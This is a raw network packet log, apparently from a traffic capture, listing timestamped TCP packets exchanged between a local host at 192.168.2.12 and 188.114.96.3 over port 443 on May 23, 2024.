                May 23, 2024 18:26:37.916111946 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.916140079 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.916177988 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.916184902 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.916208982 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.917072058 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.917136908 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.917169094 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.917175055 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.917200089 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.918087959 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.918109894 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.918148994 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.918157101 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.918179035 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.918999910 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.919024944 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.919060946 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.919068098 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.919092894 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.920226097 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.920244932 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.920284986 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.920294046 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.920316935 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.920855999 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.920880079 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.920914888 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.920921087 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.920944929 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.921818018 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.921844006 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.921888113 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.921894073 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.921911955 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.975286961 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.996557951 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.996630907 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.996742010 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.996778965 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.996794939 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.997940063 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.997997999 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.998033047 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.998040915 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.998066902 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.998100996 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.998675108 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.998720884 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.998744011 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.998749971 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.998774052 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.998792887 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.002096891 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.002149105 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.002185106 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.002192020 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.002224922 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.002242088 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.004081011 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.004136086 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.004182100 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.004189014 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.004215002 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.004236937 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.004920959 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.004970074 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.004992008 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.004997015 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.005024910 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.005045891 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.005445957 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.005495071 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.005515099 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.005520105 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.005548954 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.005568981 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.006509066 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.006555080 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.006580114 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.006586075 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.006624937 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.006650925 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.085952044 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.085994005 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.086066961 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.086083889 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.086097002 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.086230993 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.087737083 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.087771893 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.087831974 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.087837934 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.087891102 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.087975979 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.088000059 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.088032961 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.088037014 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.088063955 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.088083029 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.091747999 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.091773033 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.091830969 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.091835976 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.091906071 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.093151093 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.093178034 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.093213081 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.093218088 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.093240023 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.093261003 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.093427896 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.093445063 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.093496084 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.093499899 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.093559980 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.094676018 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.094696045 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.094753981 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.094758987 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.094810009 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.095396996 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.095412970 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.095458984 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.095463037 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.095516920 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.177644014 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.177671909 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.177722931 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.177944899 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.177975893 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.178046942 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.182977915 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.182996988 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.183085918 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.183111906 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.183732033 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.183754921 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.183787107 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.183798075 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.183816910 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.184123993 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.184139967 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.184175014 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.184182882 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.184207916 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.184954882 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.184977055 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.185009003 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.185018063 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.185038090 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.185945034 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.185960054 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.186000109 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.186008930 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.186031103 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.186678886 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.186701059 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.186758995 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.186765909 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.240906000 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.265358925 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.265386105 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.265443087 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.265460968 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.265477896 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.266345978 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.266367912 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.266427040 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.266433954 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.266459942 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.266499996 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.266796112 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.266813040 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.266868114 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.266874075 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.269613028 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.272610903 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.272633076 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.272691965 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.272697926 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.272809029 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.273236036 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.273252964 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.273308992 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.273314953 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.273422956 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.275358915 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.275377989 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.275444984 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.275450945 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.275471926 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.275489092 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.275492907 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.275517941 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.275522947 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.275548935 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.275574923 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.275635958 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.275652885 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.275686979 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.275691032 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.275716066 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.275738955 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.354096889 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.354134083 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.354278088 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.354301929 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.354428053 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.355005026 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.355030060 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.355067015 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.355071068 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.355096102 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.355112076 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.355496883 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.355516911 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.355547905 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.355551958 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.355581999 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.361032009 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.361052036 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.361090899 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.361095905 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.361136913 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.361758947 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.361783981 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.361818075 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.361823082 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.361854076 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.362781048 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.362801075 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.362835884 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.362840891 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.362859011 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.362873077 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.362879992 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.362894058 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.362900972 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.362932920 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.363975048 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.363991022 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.364028931 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.364032984 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.364092112 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.443032026 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.443057060 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.443293095 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.443303108 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.443464041 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.443783045 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.443800926 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.443842888 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.443846941 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.443907022 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.444645882 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.444662094 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.444715977 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.444720030 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.446475983 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.449736118 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.449755907 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.449805021 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.449810028 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.449842930 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.451586962 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.451603889 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.451659918 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.451663971 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.451721907 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.452188015 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.452203989 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.452243090 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.452246904 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.452276945 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.452799082 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.452825069 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.452872992 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.452877045 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.452929974 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.453681946 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.453700066 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.453744888 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.453748941 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.453774929 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.531804085 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.531837940 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.531923056 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.531961918 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.532068968 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.532510042 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.532536983 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.532571077 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.532582998 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.532602072 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.532619953 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.533117056 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.533133984 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.533180952 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.533195019 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.533243895 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.539151907 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.539174080 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.539227009 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.539252996 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.539299011 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.539953947 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.539973974 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.540005922 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.540018082 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.540040016 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.540056944 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.540523052 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.540539026 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.540580988 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.540591002 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.540646076 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.541512966 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.541554928 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.541599989 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.541610003 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.541620970 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.541646004 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.541661978 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.541671038 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.541695118 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.541711092 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.620702982 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.620733976 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.620819092 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.620853901 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.620899916 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.621423960 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.621448994 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.621485949 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.621491909 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.621521950 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.621543884 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.622334003 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.622365952 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.622409105 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.622415066 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.622441053 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.622467995 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.627396107 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.627414942 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.627474070 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.627480984 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.627561092 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.628381014 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.628396034 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.628454924 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.628459930 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.628509045 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.629410982 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.629426956 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.629475117 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.629479885 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.629506111 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.629523993 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.630386114 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.630402088 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.630445957 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.630451918 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.630484104 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.630501986 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.631362915 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.631381035 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.631463051 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.631469011 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.631508112 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.709166050 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.709206104 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.709371090 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.709389925 CEST44349720188.114.96.3192.168.2.12
